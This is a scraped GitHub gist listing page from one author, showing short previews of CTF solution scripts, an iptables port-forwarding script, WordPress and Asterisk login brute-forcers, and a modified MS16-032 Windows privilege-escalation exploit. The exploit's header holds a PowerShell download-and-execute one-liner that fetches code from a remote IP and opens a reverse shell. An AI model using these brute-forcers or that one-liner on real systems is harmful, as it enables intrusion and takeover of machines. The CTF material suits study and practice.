This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Solution for TAMUctf 2017 : pwn200-pwn4 | |
| # @author intrd - http://dann.com.br/ | |
| # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
| from pwn import * | |
| r = remote('web.ctf.tamu.edu', 4324) | |
| elf = ELF('./pwn4') | |
| payload = "A"*16 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Solution for TAMUctf 2017 : pwn200-pwn3 | |
| # @author intrd - http://dann.com.br/ | |
| # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
| # A big thx to liveoverflow 4 this padding tip, https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w | |
| import struct | |
| # 0x80485ab = print_flag | |
| # 0x804a01c = exit@plt |
intrd
/ prog300.py
Last active
April 14, 2018 18:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| import re, sys, string, math, time, os, random | |
| sys.path.append("../../LIBS") | |
| from int_netcat import Netcat | |
| def get_bitn(xx): | |
| y=8 | |
| for x in range (1,50): | |
| y=2*y | |
| if y > xx: |
intrd
/ iptables_forward_website_port.py
Last active
April 28, 2017 15:34
Forward a remote site:port to a localhost:port
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # Forward a remote site:port to a localhost:port | |
| # @author intrd - http://dann.com.br/ | |
| # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
| iptables -F | |
| iptables -t nat -F | |
| iptables -X | |
| sysctl -w net.ipv4.conf.all.route_localnet=1 |
intrd
/ shx8-web200_freelyrics-wordpress_custom_bruteforce.py
Last active
April 28, 2017 19:52
Solution to shx8 : web200-freelyrics (Wordpress custom bruteforce w/ nozzlr)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Nozzlr template : HTTP POST bruteforcer (Solution to shx8 : web200-freelyrics (Wordpress custom bruteforce)) | |
| # @author intrd - http://dann.com.br/ | |
| # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
| import urllib, shutil, json, requests, pickle, os.path | |
| target="http://lab.shellterlabs.com:32914" | |
| def nozz_module(payload, self=False, founds=False): | |
| payloads=':'.join(str(v) for v in payload.values()) |
intrd
/ shx10-misc100_thx.py
Created
May 23, 2017 01:11
Solution for SHX10 : misc100-thx (script to vertical slice 1px lines, shuffle and rejoin)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Solution for SHX10 : misc100-thx (script to vertical slice 1px lines, shuffle and rejoin) | |
| # @author intrd - http://dann.com.br/ | |
| # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
| from __future__ import division | |
| import PIL, Image, random, math, os, time | |
| import numpy as np | |
| from shutil import copyfile | |
| def rejoin(slices,outfilename): |
intrd
/ shx10-web200-Read_My_eMail.py
Last active
May 24, 2017 04:39
Solution for SHX10 : web200-Read_My_eMail (recover the stream cipher key and create a valid session for every username)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Solution for SHX10 : web200-Read_My_eMail (recover the stream cipher key and create a valid session for every username) | |
| # @author intrd - http://dann.com.br/ | |
| # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
| import hashlib | |
| def xor_bytearray(d, k): | |
| return bytearray(a^b for a, b in zip(*map(bytearray, [d, k]))) | |
| def generate_sessionid(given_username,anyusername): |
intrd
/ asterisk_bruteforce.py
Last active
June 22, 2017 03:20
Nozzlr template : RAW Asterisk Call Management 1.1 (port 5038) - PoC tested on Asterisk Call Manager 1.1 / FPBX-2.8.1(1.8.7.0), maybe still working on future versions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Nozzlr template : RAW Asterisk Call Management 1.1 (port 5038) - PoC tested on Asterisk Call Manager 1.1 / FPBX-2.8.1(1.8.7.0), maybe still working on future versions. | |
| # @author intrd - http://dann.com.br/ | |
| # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
| # Make a copy of this template and adapt to your task! | |
| import sys, time | |
| sys.path.append("libs/") | |
| from int_netcat import Netcat |
intrd
/ ms16_032_intrd_mod.ps1
Last active
October 16, 2021 11:33
Win7-Win10 & 2k8-2k12 <== 32/64bit privilege escalation (MS16-032 exploit modded) - command argv + reverse shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv | |
| # Follow this cmd to exploit MS16-032 to get admin and run shell.ps1(ATTACHMNT): Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command YOURCOMANDHERE" | |
| # To get a reverse powershell, serve this ms16_032_intrd_mod.ps1 and Invoke-PowerShellTcp.ps1, and use this download & exec oneliner: IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3003" | |
| function Invoke-MS16-032 { | |
| <# | |
| .SYNOPSIS | |
| PowerShell implementation of MS16-032. The exploit targets all vulnerable |
intrd
/ hackaflag2017-jp_prog300-encoding.py
Last active
April 14, 2018 18:35
Encoding solution - prog300 @ hackaflag 2017 - joao pessoa
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| #!/usr/bin/python | |
| ## Encoding solution - prog300 @ hackaflag 2017 - joao pessoa | |
| # @author intrd - http://dann.com.br/ + pwn4food team | |
| # int_netcat.py: https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a | |
| import re, sys, string, math, time, os, random | |
| sys.path.append("../../LIBS") | |
| from int_netcat import Netcat |